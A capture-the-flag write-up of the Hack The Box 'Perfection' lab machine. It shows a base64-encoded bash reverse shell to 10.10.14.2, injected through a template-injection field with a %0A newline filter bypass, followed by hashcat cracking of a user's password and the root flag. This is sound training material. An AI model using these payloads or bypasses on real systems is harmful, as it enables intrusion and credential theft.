- Published on
HTB: Perfection Sanity Check | CBBH - CPTS
- Authors
- Name
- Neospring
- @chrisalupului
These notes serve primarily as a validation and reference tool for HTB Academy Modules, documenting the insights acquired from HTB machines/boxes that have contributed to my progression in the CBBH & CPTS path from Hackthebox. They are not designed as instructional guides, but they do contain spoilers and insights as you advance further.
Sanity Checklist
Hackthebox Academy subscription is required to view the information in each module.
| Topic | Module |
|---|---|
| ✅ Enumeration | GETTING STARTED |
| --- Did you enumerate everything? | |
| ✅ Nmap | SERVICE ENUMERATION |
| --- Have you done a nmap scan of all ports? | |
| ✅ Page Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF |
| --- Have you discovered all pages available? | |
| ✅ Vhost Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF |
| --- Any subdomains available? | |
| ✅ Directory Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF |
| --- Any other directories? | |
| ✅ Burp Intruder | USING WEB PROXIES |
| --- Have you intercepted all possible requests? | |
| ✅ Server-side Attacks | INTRO to SSI |
| --- Have you discovered a way to bypass the "Malicious input blocked" | |
| ✅ Shells & Payloads | REVERSE SHELLS |
| --- Have you found the right payload for a reverse shell? | |
| ✅ Cracking Psw with Hashcat | DICTIONARY ATTACK |
| --- Did you find susans mail for cracking? | |
| ✅ Privilege Escalation | SUDO |
⚠️ Contains spoilers ahead that assist beyond the Sanity Check above ⚠️
Recon
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80e479e85928df952dad574a4604ea70 (ECDSA)
| 256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqNwnyqGqYHNSIjQnv7hRU0UC9Q4oB4g9Pfzuj2qcG4
80/tcp open http syn-ack nginx
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Information Disclosure
<!-- Footer -->
<footer>
<p class="copyright">Copyright Secure Student Tools. All rights reserved<br><b>Powered by WEBrick 1.7.0</b></p>
</footer>
Burp Interception
Base64 encoded
╭─kali at kali in ~
╰─○ base64 <<< "bash -i >& /dev/tcp/10.10.14.2/1234 0>&1" | sed 's/\+/\%2b/'
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=
Payload Injection - Base64 - Reverse Shell
Burp repeater request. Important note: %0A is the new line bypass, which allows anything to be injected after it, including a reverse shell
category1=History%0A<%25%3dsystem("echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=+|+base64+-d+|+bash");%25>&grade1=1&weight1=100&category2=00&grade2=0&weight2=0&category3=0&grade3=0&weight3=0&category4=0&grade4=0&weight4=0&category5=0&grade5=0&weight5=0cd
Footdhold - Susan
susan@perfection:~$ id
id
uid=1001(susan) gid=1001(susan) groups=1001(susan), 27(sudo)
susan@perfection:~$
Susan has sudo but requires password
Migration - sqlite database
Holding password hashes for several users
Hashcat bruteforcing
╭─kali at kali in ~
╰─○ hashcat -m 1400 susan_hash.txt -a 3 'susan_nasus_?d?d?d?d?d?d?d?d?d'
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux) - Platform
=========================================================
* Device #1: gameboy
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
* Raw-Hash
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Wed Jul 17 00:34:36 2024 (22 secs)
Time.Estimated...: Wed Jul 17 00:34:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14500.5 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324567040/1000000000 (32.46%)
Rejected.........: 0/324567040 (0.00%)
Restore.Point....: 324550656/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_354540610 -> susan_nasus_700440610
Started: Wed Jul 17 00:34:28 2024
Stopped: Wed Jul 17 00:34:27 2024
Root flag.txt
susan@perfection:~$ sudo su
[sudo] password for susan:
root@perfection:/home/susan# cd /root
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
f572e32a1023520404b1ab773c8ea534
root@perfection:~#
Important Bypass
The \n url encoded to %0A was the important bypass for a payload injection with a reverese shell.